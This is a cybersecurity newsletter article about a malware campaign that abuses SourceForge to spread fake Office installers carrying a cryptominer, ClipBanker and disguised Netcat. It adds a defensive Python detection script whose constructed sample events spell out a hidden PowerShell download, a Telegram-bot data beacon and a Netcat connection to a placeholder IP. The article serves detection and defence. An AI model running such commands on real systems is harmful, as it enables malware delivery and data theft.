
Malicious Software Campaign Uses SourceForge to Distribute Cryptocurrency Malware

Cybersecurity researchers have uncovered an active malware campaign that exploits SourceForge to distribute malicious payloads

CYBER SYRUP
Delivering the sweetest insights on cybersecurity.

Cybersecurity researchers have uncovered an active malware campaign that exploits SourceForge, a popular open-source software hosting platform, to distribute malicious payloads under the guise of cracked Microsoft Office applications. The goal of the campaign is to install cryptocurrency miners and clipper malware on victims' devices, particularly targeting Russian-speaking users.

Abuse of Open-Source Platforms

According to a new report from Kaspersky, attackers have created a SourceForge project named “officepackage”, mimicking legitimate Microsoft Office add-ins from GitHub. While the page appears benign at first glance, its Russian-language content and suspicious behavior raise red flags.

Each SourceForge project automatically receives a dedicated subdomain (e.g., officepackage.sourceforge[.]io). This site lists various Microsoft Office applications and download links, giving the impression of legitimacy. Hovering over these links reveals a familiar SourceForge URL (loading.sourceforge[.]io/download). However, clicking the link redirects users to a third-party domain hosted on taplink[.]cc.

The Infection Chain: From Click to Compromise

Users who follow the redirect are prompted to download a file named vinstaller.zip. Once extracted, this archive contains:

  • A password-protected ZIP file (installer.zip)

  • A text file containing the password

Inside the protected archive is an MSI installer that drops several files, including:

  • A console utility (UnRAR.exe)

  • A RAR archive

  • A Visual Basic (VB) script

The VB script runs a PowerShell command that downloads a batch file named confvk from GitHub. This batch file:

  • Retrieves the password for the RAR archive

  • Unpacks its contents

  • Executes additional payloads

The batch file launches two more PowerShell scripts:

  • One sends system metadata to a Telegram bot

  • The other downloads another script, which executes the final malware payloads, including a cryptocurrency miner and a ClipBanker (clipper malware)

Netcat is also deployed under the name ShellExperienceHost.exe, borrowing the name of a legitimate Windows component, to establish an encrypted remote connection to the attacker's server.
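The chain above is detectable from process-creation telemetry alone, because each stage leaves a parent/child or command-line pattern that a legitimate Office install never produces. The following is an added example written for this article, not code from Kaspersky or the campaign: it encodes those patterns as rules over Sysmon-style Event ID 1 records (field names Image, ParentImage, CommandLine follow Sysmon; the events, paths, user name, GitHub URL and IP address are constructed for illustration) and reports how many stages of the chain a host has exhibited.

```python
"""Rules for the SourceForge 'officepackage' chain over process-creation events.

Added example, not from the original article. Field names follow Sysmon Event
ID 1; the sample events below are constructed and do not come from any real host.
"""
import re
from typing import Dict, List

# The genuine Windows ShellExperienceHost.exe only ever lives under this directory.
LEGIT_SEH_DIR = r"c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy"

# Common PowerShell / LOLBin download cradles.
DOWNLOAD_CRADLE = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer|\bcurl\b|\bwget\b)",
    re.IGNORECASE,
)

# Which stage of the described chain each rule corresponds to.
STAGE_OF = {
    "msi_spawns_script_host": 1,          # MSI drops and runs the VB script
    "script_host_powershell_download": 2,  # VB script -> PowerShell fetches confvk
    "powershell_github_download": 2,
    "unrar_password_extract": 3,           # UnRAR unpacks the password-protected RAR
    "telegram_beacon": 4,                  # system metadata sent to a Telegram bot
    "masqueraded_shellexperiencehost": 5,  # Netcat renamed to a Windows binary name
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: Dict[str, str]) -> List[str]:
    """Return the rules tripped by one process-creation event (empty if benign)."""
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    cmd_l = cmd.lower()
    hits: List[str] = []

    if parent == "msiexec.exe" and image in ("wscript.exe", "cscript.exe"):
        hits.append("msi_spawns_script_host")

    if image == "powershell.exe" and DOWNLOAD_CRADLE.search(cmd):
        if parent in ("wscript.exe", "cscript.exe"):
            hits.append("script_host_powershell_download")
        if "github" in cmd_l:
            hits.append("powershell_github_download")

    # UnRAR's -p<password> switch on the command line.
    if image == "unrar.exe" and re.search(r"(^|\s)-p\S", cmd, re.IGNORECASE):
        hits.append("unrar_password_extract")

    if image == "powershell.exe" and "api.telegram.org" in cmd_l:
        hits.append("telegram_beacon")

    if image == "shellexperiencehost.exe":
        full = ev.get("Image", "").replace("/", "\\").lower()
        if not full.startswith(LEGIT_SEH_DIR + "\\"):
            hits.append("masqueraded_shellexperiencehost")

    return hits


def scan(events: List[Dict[str, str]]) -> dict:
    """Apply every rule to every event; the chain is 'matched' at three or more stages."""
    findings = [(i, rule) for i, ev in enumerate(events) for rule in check_event(ev)]
    stages = sorted({STAGE_OF[rule] for _, rule in findings})
    return {"findings": findings, "stages": stages, "chain_matched": len(stages) >= 3}


# Constructed sample telemetry (not real logs): six chain events plus one benign
# ShellExperienceHost.exe launch from its legitimate location.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\u\Downloads\installer.msi"'},
    {"Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'wscript.exe "C:\Users\u\AppData\Local\Temp\run.vbs"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
                    "'https://raw.githubusercontent.com/example/repo/main/confvk',"
                    "'C:\\Users\\u\\AppData\\Local\\Temp\\confvk.bat')\""},
    {"Image": r"C:\Users\u\AppData\Local\Temp\UnRAR.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"UnRAR.exe x -pSECRET C:\Users\u\AppData\Local\Temp\payload.rar C:\Users\u\AppData\Local\Temp"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -c \"Invoke-WebRequest https://api.telegram.org/bot<token>/sendMessage -Method POST\""},
    {"Image": r"C:\Users\u\AppData\Roaming\ShellExperienceHost.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "ShellExperienceHost.exe 203.0.113.10 443"},
    {"Image": r"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "CommandLine": "ShellExperienceHost.exe"},
]

if __name__ == "__main__":
    result = scan(SAMPLE_EVENTS)
    for idx, rule in result["findings"]:
        print(f"event {idx}: {rule}")
    print("stages seen:", result["stages"], "chain matched:", result["chain_matched"])
```

The rules are deliberately specific to the parent/child relationships the report describes (msiexec.exe spawning a script host, a script host spawning a PowerShell download cradle) rather than to file hashes or the confvk name alone, so they survive trivial re-packaging; the masquerade rule keys on the real ShellExperienceHost.exe path, which the attacker cannot write to without already holding SYSTEM.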

Targeted Victims and Geographic Focus

Kaspersky notes that 90% of the campaign's victims are located in Russia, with over 4,600 unique users affected between January and March 2025. This focus is evident from the Russian-language interface of the fake SourceForge page and its prominence in Yandex search results.

“As users seek ways to download applications outside official sources, attackers offer their own,” Kaspersky said. “While the attack primarily targets cryptocurrency by deploying a miner and ClipBanker, the attackers could sell system access to more dangerous actors.”

Broader Context: Malvertising and Fake Software Campaigns

This incident is part of a larger trend where attackers exploit public software platforms and search engines to spread malware.

Additional Campaigns Identified:

  1. TookPS Loader via Fake AI Tools
    Disguised as DeepSeek AI and as remote desktop applications, TookPS malware is delivered through Google ads and malicious websites (e.g., deepseek-ai-soft[.]com).

    • Drops PowerShell scripts to establish SSH-based remote access

    • Installs a modified TeviRat trojan

    • Uses DLL sideloading to manipulate TeamViewer for covert control

  2. Malicious Ads for RVTools (VMware Utility)
    Attackers serve tampered versions of RVTools using Google ads, embedding ThunderShell (aka SMOKEDHAM), a PowerShell-based remote access tool (RAT) used for command-and-control operations.

“ThunderShell is a post-exploitation framework used in red teaming and real-world attacks,” said researchers at Field Effect. “It allows remote operators to execute PowerShell commands on compromised systems through a command-and-control environment.”

Mitigation and Recommendations

For Individuals:

  • Avoid downloading software from unofficial sources, especially cracked versions

  • Use reputable antivirus and anti-malware software

  • Monitor system performance—unexpected slowdowns may indicate mining activity

For Organizations:

  • Educate staff about social engineering and malvertising risks

  • Implement web filtering to block known malicious domains

  • Use endpoint detection and response (EDR) tools, together with PowerShell script block logging and process-creation auditing, to catch script-based stages such as the VB script, batch file and PowerShell downloaders described above

Conclusion

The abuse of platforms like SourceForge and the use of legitimate branding to distribute malware highlight the evolving sophistication of cybercriminals. Campaigns like this one, TookPS and the RVTools malvertising show how attackers blend social engineering, open-source platform abuse and malvertising to deliver malware at scale.

Staying vigilant and adopting best security practices are essential in mitigating these threats—especially in regions and sectors increasingly targeted by these evolving attack vectors.